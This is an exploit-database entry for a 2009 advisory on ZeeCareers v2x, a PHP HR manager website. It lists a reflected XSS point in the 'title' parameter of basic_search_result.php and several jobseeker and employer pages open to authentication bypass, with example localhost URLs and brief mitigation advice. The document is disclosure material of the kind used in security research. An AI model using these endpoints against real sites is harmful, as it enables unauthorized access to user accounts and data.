header-logo
Suggest Exploit
vendor:
ZeeCareers HR Manager Website
by:
bi0
8.8
CVSS
HIGH
XSS and Auth Bypass
79 (XSS) and 287 (Authentication Bypass)
CWE
Product Name: ZeeCareers HR Manager Website
Affected Version From: 2x
Affected Version To: 2x
Patch Exists: NO
Related CWE: N/A
CPE: a:zeecareers:zeecareers_hr_manager_website
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ZeeCareers v2x – PHP HR Manager Website [ XSS / Auth Bypass ]

ZeeCareers v2x is vulnerable to XSS and Auth Bypass. An attacker can inject malicious JavaScript code into the 'title' parameter of the 'basic_search_result.php' page. Additionally, the 'editprofile.php', 'forgot.php', 'additionalfeatures.php', 'employer_reg.php' pages are vulnerable to Auth Bypass.

Mitigation:

Input validation should be used to prevent XSS attacks. Authentication should be enforced for all pages.
Source

Exploit-DB raw data:

# Title: ZeeCareers v2x - PHP HR Manager Website [ XSS / Auth Bypass ]
# Date: 12/12/2009
# Author: bi0
# Software Link: http://www.zeecareers.com/
# Version: 2x
# CVE : ()
# Code :

                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] ZeeCareers v2x - PHP HR Manager Website [ XSS / Auth Bypass ]
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,redking,Zer0flag,sp1r1t and ssteam.ws ...
#
#   // Software Info
# [x] Name : ZeeCareers v2x - PHP HR Manager Website
# [x] Vendor : http://www.zeecareers.com/
# [x] Version : 2x
# [x] Price : 149.00 USD
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
#    [XSS]
#
#    http://localhost/basic_search_result.php?title=[XSS]
#
#    [Auth Bypass]
#
#    http://localhost/jobseekers/editprofile.php
#    http://localhost/jobseekers/forgot.php
#    http://localhost/jobseekers/additionalfeatures.php
#
#    [ And ]
#
#    http://localhost/employers/editprofile.php
#    http://localhost/employers/employer_reg.php
#
#
[#]------------------------------------------------------------------------------------------[#]

#EOF

Navigation

Suggest Exploit

Services By CQR